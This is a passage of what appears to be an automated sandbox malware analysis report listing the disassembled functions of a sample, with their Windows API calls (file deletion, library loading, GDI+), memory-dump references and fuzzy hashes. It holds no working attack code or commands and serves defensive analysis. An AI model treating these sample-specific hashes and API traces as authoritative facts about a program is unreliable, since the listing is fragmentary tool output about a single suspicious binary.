        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AttributesFile$_wcslen
        • String ID:
        • API String ID: 2673547680-0
        • Opcode ID: 64da1bbbed72b804d5ce748dcfd5ff0f5da3ba31f544da52540ad244dd567a70
        • Instruction ID: 7a83c583a293ae47ea9c66d84c4e1b85d9c412a77dc7f478ab2c056d27ca8fca
        • Opcode Fuzzy Hash: 64da1bbbed72b804d5ce748dcfd5ff0f5da3ba31f544da52540ad244dd567a70
        • Instruction Fuzzy Hash: 67F0ED31109229BBDF115FA0DC40BDE376CBF143CAF008061BA44DA1A0DB31DDE59BA0
        Function 0012B470 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
        Download Yara Rule
        APIs
        • DeleteFileW.KERNEL32(?,00000000,?,0012A438,?,?,?,?,0012892B,?,?,?,001537FF,000000FF), ref: 0012B481
          • Part of subcall function 0012CF32: _wcslen.LIBCMT ref: 0012CF56
        • DeleteFileW.KERNEL32(?,?,?,00000800,?,0012A438,?,?,?,?,0012892B,?,?,?,001537FF,000000FF), ref: 0012B4AF
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: DeleteFile$_wcslen
        • String ID:
        • API String ID: 2643169976-0
        • Opcode ID: 88ea2ef27fcd3e8906b7ea9f4e00af5a435b6e4bf7facf71c480229a9a1b9c5a
        • Instruction ID: 8c3d7f1e01b41a9a9887f279c95f3f34425cfee12ec161f6dcb4cb67fcdcc429
        • Opcode Fuzzy Hash: 88ea2ef27fcd3e8906b7ea9f4e00af5a435b6e4bf7facf71c480229a9a1b9c5a
        • Instruction Fuzzy Hash: 0DE06832504268ABEB006F60DC80FDE335CAF043C7F044022BE05C60A1EF30DCD49A50
        Function 0013BD71 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
        Download Yara Rule
        APIs
        • GdiplusShutdown.GDIPLUS(?,?,?,?,001537FF,000000FF), ref: 0013BDA5
        • CoUninitialize.COMBASE(?,?,?,?,001537FF,000000FF), ref: 0013BDAA
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: GdiplusShutdownUninitialize
        • String ID:
        • API String ID: 3856339756-0
        • Opcode ID: 5b4f6a40d5d4728cb1f7e6624ef65ee8b013284c4b25ed87d29ad131e1b3187d
        • Instruction ID: 39b7f96ae26651b42036846272aaeef58a20225ceff7dadf0eb0d0bc585b9511
        • Opcode Fuzzy Hash: 5b4f6a40d5d4728cb1f7e6624ef65ee8b013284c4b25ed87d29ad131e1b3187d
        • Instruction Fuzzy Hash: 0AE06572504650EFC710DB48DC05B09FBA9FB88B24F04422AF42593B60CB746841CA90
        Function 0012B4D3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
        Download Yara Rule
        APIs
        • GetFileAttributesW.KERNEL32(?,?,?,0012B4CA,?,00128042,?), ref: 0012B4E4
          • Part of subcall function 0012CF32: _wcslen.LIBCMT ref: 0012CF56
        • GetFileAttributesW.KERNEL32(?,?,?,00000800,?,?,0012B4CA,?,00128042,?), ref: 0012B510
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AttributesFile$_wcslen
        • String ID:
        • API String ID: 2673547680-0
        • Opcode ID: 0e707634ccd4fe1d267b4ad9f035eb036c6b06b3172261464e84a0cb32e63974
        • Instruction ID: 46b0c75184f65071939bbfd790edea9a5735e66c05fc222a5cc084be800d730c
        • Opcode Fuzzy Hash: 0e707634ccd4fe1d267b4ad9f035eb036c6b06b3172261464e84a0cb32e63974
        • Instruction Fuzzy Hash: 60E092325002786BCB20AB64EC04BDA775CAB193E6F000160FE45E71D1D770AD918AD0
        Function 0013EFF2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
        Download Yara Rule
        APIs
        • _swprintf.LIBCMT ref: 0013F01C
          • Part of subcall function 00124A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00124A33
        • SetDlgItemTextW.USER32(00000065,?), ref: 0013F033
          • Part of subcall function 0013C748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0013C759
          • Part of subcall function 0013C748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0013C76A
          • Part of subcall function 0013C748: IsDialogMessageW.USER32(00010424,?), ref: 0013C77E
          • Part of subcall function 0013C748: TranslateMessage.USER32(?), ref: 0013C78C
          • Part of subcall function 0013C748: DispatchMessageW.USER32(?), ref: 0013C796
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Message$CallbackDialogDispatchDispatcherItemPeekTextTranslateUser__vswprintf_c_l_swprintf
        • String ID:
        • API String ID: 3954729096-0
        • Opcode ID: f3bb6c8c9aa8efcf4d0b3f34bb97f9c9886ea14bff4ec75bb2900ad2ae3db0fc
        • Instruction ID: ee155a5f8223d1b5c15e04691020856682c8681768bb4f597e8140cc6530478a
        • Opcode Fuzzy Hash: f3bb6c8c9aa8efcf4d0b3f34bb97f9c9886ea14bff4ec75bb2900ad2ae3db0fc
        • Instruction Fuzzy Hash: 6AE02B7240421C36DF01A760DC0AFAA3AAC9B14389F480061F601E60A2D7B4D6518F61
        Function 00131B34 Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
        Download Yara Rule
        APIs
        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00131B4F
        • LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00130633,Crypt32.dll,00000000,001306AD,00000200,?,00130690,00000000,00000000,?), ref: 00131B71
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: DirectoryLibraryLoadSystem
        • String ID:
        • API String ID: 1175261203-0
        • Opcode ID: e08e7bfd506a5d7042e1d054f581e3613612dad10934247c6bd0b2558f8ed87a
        • Instruction ID: 23e664efbece2f7bef6f02d9fd3de13b81dc193c03ad59e9882159ac364c4e67
        • Opcode Fuzzy Hash: e08e7bfd506a5d7042e1d054f581e3613612dad10934247c6bd0b2558f8ed87a
        • Instruction Fuzzy Hash: 63E04876800228ABDF1197A5DC08FDA776CEF193C2F0400657645D2044DBB4DAC4CBB0
        Function 0013B3B8 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
        Download Yara Rule
        APIs
        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0013B3D9
        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0013B3E0
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: BitmapCreateFromGdipStream
        • String ID:
        • API String ID: 1918208029-0
        • Opcode ID: 9b119490aa4f937da0df48569a297ea24bbe527f68b1f5e6a70d9ec6445c8aec
        • Instruction ID: be36800c55bb2c46e1a3430addb1b2302ed071c11d920b1e6b080cab6d5404f7
        • Opcode Fuzzy Hash: 9b119490aa4f937da0df48569a297ea24bbe527f68b1f5e6a70d9ec6445c8aec
        • Instruction Fuzzy Hash: 54E0ED72904618EBCB14DF99C585699B7E8EB08351F20806EE95997600E374AE049B51
        Function 00143D0C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
        Download Yara Rule
        APIs
        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00143D2A
        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00143D35
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Value___vcrt____vcrt_uninitialize_ptd
        • String ID:
        • API String ID: 1660781231-0
        • Opcode ID: d6ffcde683ad1626c13f88c54f1a16fbe59e18f152a9534dc03cb71798024c16
        • Instruction ID: d012d369afd73960d16ef2ef2d6d37200703f8ff0c38ac20030c6a5b853cd858
        • Opcode Fuzzy Hash: d6ffcde683ad1626c13f88c54f1a16fbe59e18f152a9534dc03cb71798024c16
        • Instruction Fuzzy Hash: 75D02276C0471505EC183BF43C0229B2388AB317B1BF02746F070D74F1EF1086003512
        Function 001212D1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ItemShowWindow
        • String ID:
        • API String ID: 3351165006-0
        • Opcode ID: d07fcc8ff7584d8865ac9ce7ec2e3bca7d4aff0bc30a270947e8664c0f464ba4
        • Instruction ID: 05c69be265a8681ce479804dc944355c78e108690066f2d18f21b47c839def14
        • Opcode Fuzzy Hash: d07fcc8ff7584d8865ac9ce7ec2e3bca7d4aff0bc30a270947e8664c0f464ba4
        • Instruction Fuzzy Hash: 6DC01236058A00BECB010BB0DC0DE2ABBAAEBA4212F10CA08F0A6C1060C239C150DB11
        Function 00121AD3 Relevance: 1.8, APIs: 1, Instructions: 319COMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        • Opcode ID: 908dacc4579755cddf89ad191bcab33be0edd38a1f17728039aece70555b7c90
        • Instruction ID: 673034474ce9e84f0b245c5b70a74925dd471d567116c1c1c3c7541f00a81e41
        • Opcode Fuzzy Hash: 908dacc4579755cddf89ad191bcab33be0edd38a1f17728039aece70555b7c90
        • Instruction Fuzzy Hash: 64C1B774A00364AFDF25CF24E8C47AD7BA5AF66310F1905B9EC059F396C7309AA4CB61
        Function 001290A2 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
        Download Yara Rule
        APIs
        • __EH_prolog.LIBCMT ref: 001290A7
          • Part of subcall function 001213F8: __EH_prolog.LIBCMT ref: 001213FD
          • Part of subcall function 00122032: __EH_prolog.LIBCMT ref: 00122037
          • Part of subcall function 0012B966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0012B991
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog$CloseFind
        • String ID:
        • API String ID: 2506663941-0
        • Opcode ID: b84559175dbc4c16ea868321e268292e077d3a5ad408b64cf22bc8c923875d54
        • Instruction ID: b37e1a35f70d89771447dccce142492b5f74cc6d43b22488a2838179cb9191c2
        • Opcode Fuzzy Hash: b84559175dbc4c16ea868321e268292e077d3a5ad408b64cf22bc8c923875d54
        • Instruction Fuzzy Hash: F041BA71D04274AEDB24DB64ECA5AEA7379AF20340F4404EAF58A670C2D7755F99CF10
        Function 001213FD Relevance: 1.6, APIs: 1, Instructions: 107COMMON
        Download Yara Rule
        APIs
        • __EH_prolog.LIBCMT ref: 001213FD
          • Part of subcall function 00126891: __EH_prolog.LIBCMT ref: 00126896
          • Part of subcall function 0012E298: __EH_prolog.LIBCMT ref: 0012E29D
          • Part of subcall function 0012644D: __EH_prolog.LIBCMT ref: 00126452
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        • Opcode ID: 9104d20dcaf5d2559c6a2411ca04a469f9585ac7beefbec55efbc664bc389039
        • Instruction ID: 087508928159c9abb8a59bbdafecf7defdf1863179ce5c610be8b1f4b23c0e2b
        • Opcode Fuzzy Hash: 9104d20dcaf5d2559c6a2411ca04a469f9585ac7beefbec55efbc664bc389039
        • Instruction Fuzzy Hash: 525126B19063809ECB14DF6994802D9BBE5BF69300F0802BEEC5DCF69BD7755254CB61
        Function 001213F8 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
        Download Yara Rule
        APIs
        • __EH_prolog.LIBCMT ref: 001213FD
          • Part of subcall function 00126891: __EH_prolog.LIBCMT ref: 00126896
          • Part of subcall function 0012E298: __EH_prolog.LIBCMT ref: 0012E29D
          • Part of subcall function 0012644D: __EH_prolog.LIBCMT ref: 00126452
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        • Opcode ID: 33fc2aa177568c26ff1a1d9269790871b7de71cd22cb5591f18020c1f8d543c9
        • Instruction ID: 89df6d6a416a1ad5ef09d0e85a298e9f597932bf43ae32ca9be56a838a148da7
        • Opcode Fuzzy Hash: 33fc2aa177568c26ff1a1d9269790871b7de71cd22cb5591f18020c1f8d543c9
        • Instruction Fuzzy Hash: 475135B19063809EDB14DF6994802D9BBE5BF69300F0802BEEC5DCF69BD7751264CB62
        Function 0013479D Relevance: 1.6, APIs: 1, Instructions: 89COMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        • Opcode ID: 3fa06d34a33459b3a9769076c47c82d4c5bafdacce676957a7ec42076b9f5798
        • Instruction ID: c356d5b6b7c98451f85068f8227a6ff7f0a230bded628871f30786c71a36bae2
        • Opcode Fuzzy Hash: 3fa06d34a33459b3a9769076c47c82d4c5bafdacce676957a7ec42076b9f5798
        • Instruction Fuzzy Hash: 072107B1E40215AFDB14DFB4CC4265BBAACFF18754F00413AE615EB681E370AD00C6A8
        Function 0013C207 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
        Download Yara Rule
        APIs
        • __EH_prolog.LIBCMT ref: 0013C20C
          • Part of subcall function 001213F8: __EH_prolog.LIBCMT ref: 001213FD
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: H_prolog
        • String ID:
        • API String ID: 3519838083-0
        • Opcode ID: 569b29de218a95296bae515f2a3308dd67ce97adf8ee3e57b935363a0e4ffd41
        • Instruction ID: 05e30e378cd646314a65767766259056eb6a2763286b75eb65fc68b90bd9fb71
        • Opcode Fuzzy Hash: 569b29de218a95296bae515f2a3308dd67ce97adf8ee3e57b935363a0e4ffd41
        • Instruction Fuzzy Hash: D3217C71C04229AFCF15DF98D8419EEB7B4BF25304F0004AEE80AB7251E7756A55DBA1
        Function 0014BE48 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • GetProcAddress.KERNEL32(00000000,00154ADC), ref: 0014BEA8
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AddressProc
        • String ID:
        • API String ID: 190572456-0
        • Opcode ID: c634ccb6a157e166beb60f3347ce480af1435bb4d4a2b2278580ea8f4b7dab24
        • Instruction ID: 98f8e8690774754e653da71576fd1adfd43921369d94380380e317ba6d9e861d
        • Opcode Fuzzy Hash: c634ccb6a157e166beb60f3347ce480af1435bb4d4a2b2278580ea8f4b7dab24
        • Instruction Fuzzy Hash: 68110633A041259F9B26DE6CEC808DB73A9EBC43207164220FE54BB264D770EC8187D0
        Function 00128823 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
        Download Yara Rule
        APIs
        • __EH_prolog.LIBCMT ref: 00128828
          • Part of subcall function 0012E298: __EH_prolog.LIBCMT ref: 0012E29D
          • Part of subcall function 001333D4: __EH_prolog.LIBCMT ref: 001333D9
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
